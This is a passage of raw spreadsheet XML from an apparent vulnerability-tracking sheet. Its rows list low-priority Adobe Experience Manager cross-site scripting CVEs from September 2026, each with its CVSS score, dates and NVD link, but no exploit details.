t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1419" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1419" s="5" t="inlineStr" /><c r="R1419" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75709</t></is></c></row><row r="1420"><c r="A1420" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1420" s="5" t="inlineStr"><is><t>CVE-2026-75710</t></is></c><c r="D1420" s="5" t="n"><v>5.4</v></c><c r="E1420" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1420" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1420" s="5" t="inlineStr" /><c r="H1420" s="5" t="n"><v>0.003</v></c><c r="I1420" s="5" t="inlineStr" /><c r="J1420" s="5" t="inlineStr" /><c r="K1420" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1420" s="5" t="inlineStr" /><c r="M1420" s="5" t="inlineStr" /><c r="N1420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1420" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1420" s="5" t="inlineStr" /><c r="R1420" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75710</t></is></c></row><row r="1421"><c r="A1421" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1421" s="5" t="inlineStr"><is><t>CVE-2026-75711</t></is></c><c r="D1421" s="5" t="n"><v>5.4</v></c><c r="E1421" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1421" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1421" s="5" t="inlineStr" /><c r="H1421" s="5" t="n"><v>0.003</v></c><c r="I1421" s="5" t="inlineStr" /><c r="J1421" s="5" t="inlineStr" /><c r="K1421" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1421" s="5" t="inlineStr" /><c r="M1421" s="5" t="inlineStr" /><c r="N1421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1421" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1421" s="5" t="inlineStr" /><c r="R1421" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75711</t></is></c></row><row r="1422"><c r="A1422" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1422" s="5" t="inlineStr"><is><t>CVE-2026-75712</t></is></c><c r="D1422" s="5" t="n"><v>5.4</v></c><c r="E1422" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1422" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1422" s="5" t="inlineStr" /><c r="H1422" s="5" t="n"><v>0.003</v></c><c r="I1422" s="5" t="inlineStr" /><c r="J1422" s="5" t="inlineStr" /><c r="K1422" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1422" s="5" t="inlineStr" /><c r="M1422" s="5" t="inlineStr" /><c r="N1422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1422" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1422" s="5" t="inlineStr" /><c r="R1422" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75712</t></is></c></row><row r="1423"><c r="A1423" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1423" s="5" t="inlineStr"><is><t>CVE-2026-75713</t></is></c><c r="D1423" s="5" t="n"><v>5.4</v></c><c r="E1423" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1423" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1423" s="5" t="inlineStr" /><c r="H1423" s="5" t="n"><v>0.003</v></c><c r="I1423" s="5" t="inlineStr" /><c r="J1423" s="5" t="inlineStr" /><c r="K1423" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1423" s="5" t="inlineStr" /><c r="M1423" s="5" t="inlineStr" /><c r="N1423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1423" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1423" s="5" t="inlineStr" /><c r="R1423" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75713</t></is></c></row><row r="1424"><c r="A1424" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1424" s="5" t="inlineStr"><is><t>CVE-2026-75714</t></is></c><c r="D1424" s="5" t="n"><v>5.4</v></c><c r="E1424" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1424" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1424" s="5" t="inlineStr" /><c r="H1424" s="5" t="n"><v>0.003</v></c><c r="I1424" s="5" t="inlineStr" /><c r="J1424" s="5" t="inlineStr" /><c r="K1424" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1424" s="5" t="inlineStr" /><c r="M1424" s="5" t="inlineStr" /><c r="N1424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1424" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1424" s="5" t="inlineStr" /><c r="R1424" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75714</t></is></c></row><row r="1425"><c r="A1425" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1425" s="5" t="inlineStr"><is><t>CVE-2026-75715</t></is></c><c r="D1425" s="5" t="n"><v>5.4</v></c><c r="E1425" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1425" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1425" s="5" t="inlineStr" /><c r="H1425" s="5" t="n"><v>0.003</v></c><c r="I1425" s="5" t="inlineStr" /><c r="J1425" s="5" t="inlineStr" /><c r="K1425" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1425" s="5" t="inlineStr" /><c r="M1425" s="5" t="inlineStr" /><c r="N1425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1425" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1425" s="5" t="inlineStr" /><c r="R1425" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75715</t></is></c></row><row r="1426"><c r="A1426" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1426" s="5" t="inlineStr"><is><t>CVE-2026-75716</t></is></c><c r="D1426" s="5" t="n"><v>5.4</v></c><c r="E1426" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1426" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1426" s="5" t="inlineStr" /><c r="H1426" s="5" t="n"><v>0.003</v></c><c r="I1426" s="5" t="inlineStr" /><c r="J1426" s="5" t="inlineStr" /><c r="K1426" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1426" s="5" t="inlineStr" /><c r="M1426" s="5" t="inlineStr" /><c r="N1426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1426" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1426" s="5" t="inlineStr" /><c r="R1426" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75716</t></is></c></row><row r="1427"><c r="A1427" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1427" s="5" t="inlineStr"><is><t>CVE-2026-75717</t></is></c><c r="D1427" s="5" t="n"><v>5.4</v></c><c r="E1427" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1427" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1427" s="5" t="inlineStr" /><c r="H1427" s="5" t="n"><v>0.003</v></c><c r="I1427" s="5" t="inlineStr" /><c r="J1427" s="5" t="inlineStr" /><c r="K1427" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1427" s="5" t="inlineStr" /><c r="M1427" s="5" t="inlineStr" /><c r="N1427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1427" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1427" s="5" t="inlineStr" /><c r="R1427" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75717</t></is></c></row><row r="1428"><c r="A1428" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1428" s="5" t="inlineStr"><is><t>CVE-2026-75718</t></is></c><c r="D1428" s="5" t="n"><v>5.4</v></c><c r="E1428" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1428" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1428" s="5" t="inlineStr" /><c r="H1428" s="5" t="n"><v>0.003</v></c><c r="I1428" s="5" t="inlineStr" /><c r="J1428" s="5" t="inlineStr" /><c r="K1428" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1428" s="5" t="inlineStr" /><c r="M1428" s="5" t="inlineStr" /><c r="N1428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1428" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1428" s="5" t="inlineStr" /><c r="R1428" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75718</t></is></c></row><row r="1429"><c r="A1429" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1429" s="5" t="inlineStr"><is><t>CVE-2026-75719</t></is></c><c r="D1429" s="5" t="n"><v>5.4</v></c><c r="E1429" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1429" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1429" s="5" t="inlineStr" /><c r="H1429" s="5" t="n"><v>0.003</v></c><c r="I1429" s="5" t="inlineStr" /><c r="J1429" s="5" t="inlineStr" /><c r="K1429" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1429" s="5" t="inlineStr" /><c r="M1429" s="5" t="inlineStr" /><c r="N1429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1429" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1429" s="5" t="inlineStr" /><c r="R1429" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75719</t></is></c></row><row r="1430"><c r="A1430" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1430" s="5" t="inlineStr"><is><t>CVE-2026-75720</t></is></c><c r="D1430" s="5" t="n"><v>5.4</v></c><c r="E1430" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1430" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1430" s="5" t="inlineStr" /><c r="H1430" s="5" t="n"><v>0.003</v></c><c r="I1430" s="5" t="inlineStr" /><c r="J1430" s="5" t="inlineStr" /><c r="K1430" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1430" s="5" t="inlineStr" /><c r="M1430" s="5" t="inlineStr" /><c r="N1430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1430" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1430" s="5" t="inlineStr" /><c r="R1430" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75720</t></is></c></row><row r="1431"><c r="A1431" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1431" s="5" t="inlineStr"><is><t>CVE-2026-75722</t></is></c><c r="D1431" s="5" t="n"><v>5.4</v></c><c r="E1431" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1431" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1431" s="5" t="inlineStr" /><c r="H1431" s="5" t="n"><v>0.003</v></c><c r="I1431" s="5" t="inlineStr" /><c r="J1431" s="5" t="inlineStr" /><c r="K1431" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1431" s="5" t="inlineStr" /><c r="M1431" s="5" t="inlineStr" /><c r="N1431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1431" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1431" s="5" t="inlineStr" /><c r="R1431" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75722</t></is></c></row><row r="1432"><c r="A1432" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1432" s="5" t="inlineStr"><is><t>CVE-2026-75724</t></is></c><c r="D1432" s="5" t="n"><v>5.4</v></c><c r="E1432" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1432" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1432" s="5" t="inlineStr" /><c r="H1432" s="5" t="n"><v>0.003</v></c><c r="I1432" s="5" t="inlineStr" /><c r="J1432" s="5" t="inlineStr" /><c r="K1432" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1432" s="5" t="inlineStr" /><c r="M1432" s="5" t="inlineStr" /><c r="N1432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1432" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1432" s="5" t="inlineStr" /><c r="R1432" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75724</t></is></c></row><row r="1433"><c r="A1433" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1433" s="5" t="inlineStr"><is><t>CVE-2026-75725</t></is></c><c r="D1433" s="5" t="n"><v>5.4</v></c><c r="E1433" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1433" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1433" s="5" t="inlineStr" /><c r="H1433" s="5" t="n"><v>0.003</v></c><c r="I1433" s="5" t="inlineStr" /><c r="J1433" s="5" t="inlineStr" /><c r="K1433" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1433" s="5" t="inlineStr" /><c r="M1433" s="5" t="inlineStr" /><c r="N1433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1433" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1433" s="5" t="inlineStr" /><c r="R1433" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75725</t></is></c></row><row r="1434"><c r="A1434" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1434" s="5" t="inlineStr"><is><t>CVE-2026-75727</t></is></c><c r="D1434" s="5" t="n"><v>5.4</v></c><c r="E1434" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1434" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1434" s="5" t="inlineStr" /><c r="H1434" s="5" t="n"><v>0.003</v></c><c r="I1434" s="5" t="inlineStr" /><c r="J1434" s="5" t="inlineStr" /><c r="K1434" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1434" s="5" t="inlineStr" /><c r="M1434" s="5" t="inlineStr" /><c r="N1434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1434" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1434" s="5" t="inlineStr" /><c r="R1434" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1434"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75727</t></is></c></row><row r="1435"><c r="A1435" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1435" s="5" t="inlineStr"><is><t>CVE-2026-75729</t></is></c><c r="D1435" s="5" t="n"><v>5.4</v></c><c r="E1435" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1435" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1435" s="5" t="inlineStr" /><c r="H1435" s="5" t="n"><v>0.003</v></c><c r="I1435" s="5" t="inlineStr" /><c r="J1435" s="5" t="inlineStr" /><c r="K1435" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1435" s="5" t="inlineStr" /><c r="M1435" s="5" t="inlineStr" /><c r="N1435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1435" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1435" s="5" t="inlineStr" /><c r="R1435" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1435"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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75729</t></is></c></row><row r="1436"><c r="A1436" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1436" s="5" t="inlineStr"><is><t>CVE-2026-75730</t></is></c><c r="D1436" s="5" t="n"><v>5.4</v></c><c r="E1436" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1436" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1436" s="5" t="inlineStr" /><c r="H1436" s="5" t="n"><v>0.003</v></c><c r="I1436" s="5" t="inlineStr" /><c r="J1436" s="5" t="inlineStr" /><c r="K1436" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1436" s="5" t="inlineStr" /><c r="M1436" s="5" t="inlineStr" /><c r="N1436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1436" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1436" s="5" t="inlineStr" /><c r="R1436" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75730</t></is></c></row><row r="1437"><c r="A1437" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1437" s="5" t="inlineStr"><is><t>CVE-2026-75731</t></is></c><c r="D1437" s="5" t="n"><v>5.4</v></c><c r="E1437" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1437" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1437" s="5" t="inlineStr" /><c r="H1437" s="5" t="n"><v>0.003</v></c><c r="I1437" s="5" t="inlineStr" /><c r="J1437" s="5" t="inlineStr" /><c r="K1437" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1437" s="5" t="inlineStr" /><c r="M1437" s="5" t="inlineStr" /><c r="N1437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1437" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1437" s="5" t="inlineStr" /><c r="R1437" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75731</t></is></c></row><row r="1438"><c r="A1438" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1438" s="5" t="inlineStr"><is><t>CVE-2026-75733</t></is></c><c r="D1438" s="5" t="n"><v>5.4</v></c><c r="E1438" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1438" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1438" s="5" t="inlineStr" /><c r="H1438" s="5" t="n"><v>0.003</v></c><c r="I1438" s="5" t="inlineStr" /><c r="J1438" s="5" t="inlineStr" /><c r="K1438" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1438" s="5" t="inlineStr" /><c r="M1438" s="5" t="inlineStr" /><c r="N1438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1438" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1438" s="5" t="inlineStr" /><c r="R1438" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75733</t></is></c></row><row r="1439"><c r="A1439" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1439" s="5" t="inlineStr"><is><t>CVE-2026-75734</t></is></c><c r="D1439" s="5" t="n"><v>5.4</v></c><c r="E1439" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1439" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1439" s="5" t="inlineStr" /><c r="H1439" s="5" t="n"><v>0.003</v></c><c r="I1439" s="5" t="inlineStr" /><c r="J1439" s="5" t="inlineStr" /><c r="K1439" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1439" s="5" t="inlineStr" /><c r="M1439" s="5" t="inlineStr" /><c r="N1439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1439" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1439" s="5" t="inlineStr" /><c r="R1439" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1439"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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75734</t></is></c></row><row r="1440"><c r="A1440" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1440" s="5" t="inlineStr"><is><t>CVE-2026-75735</t></is></c><c r="D1440" s="5" t="n"><v>5.4</v></c><c r="E1440" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1440" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1440" s="5" t="inlineStr" /><c r="H1440" s="5" t="n"><v>0.003</v></c><c r="I1440" s="5" t="inlineStr" /><c r="J1440" s="5" t="inlineStr" /><c r="K1440" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1440" s="5" t="inlineStr" /><c r="M1440" s="5" t="inlineStr" /><c r="N1440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1440" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1440" s="5" t="inlineStr" /><c r="R1440" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1440"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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75735</t></is></c></row><row r="1441"><c r="A1441" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1441" s="5" t="inlineStr"><is><t>CVE-2026-75736</t></is></c><c r="D1441" s="5" t="n"><v>5.4</v></c><c r="E1441" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1441" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1441" s="5" t="inlineStr" /><c r="H1441" s="5" t="n"><v>0.003</v></c><c r="I1441" s="5" t="inlineStr" /><c r="J1441" s="5" t="inlineStr" /><c r="K1441" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1441" s="5" t="inlineStr" /><c r="M1441" s="5" t="inlineStr" /><c r="N1441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1441" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1441" s="5" t="inlineStr" /><c r="R1441" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1441"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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75736</t></is></c></row><row r="1442"><c r="A1442" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1442" s="5" t="inlineStr"><is><t>CVE-2026-75737</t></is></c><c r="D1442" s="5" t="n"><v>5.4</v></c><c r="E1442" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1442" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1442" s="5" t="inlineStr" /><c r="H1442" s="5" t="n"><v>0.003</v></c><c r="I1442" s="5" t="inlineStr" /><c r="J1442" s="5" t="inlineStr" /><c r="K1442" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1442" s="5" t="inlineStr" /><c r="M1442" s="5" t="inlineStr" /><c r="N1442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1442" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1442" s="5" t="inlineStr" /><c r="R1442" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1442"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75737</t></is></c></row><row r="1443"><c r="A1443" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1443" s="5" t="inlineStr"><is><t>CVE-2026-75738</t></is></c><c r="D1443" s="5" t="n"><v>5.4</v></c><c r="E1443" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1443" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1443" s="5" t="inlineStr" /><c r="H1443" s="5" t="n"><v>0.003</v></c><c r="I1443" s="5" t="inlineStr" /><c r="J1443" s="5" t="inlineStr" /><c r="K1443" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1443" s="5" t="inlineStr" /><c r="M1443" s="5" t="inlineStr" /><c r="N1443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1443" 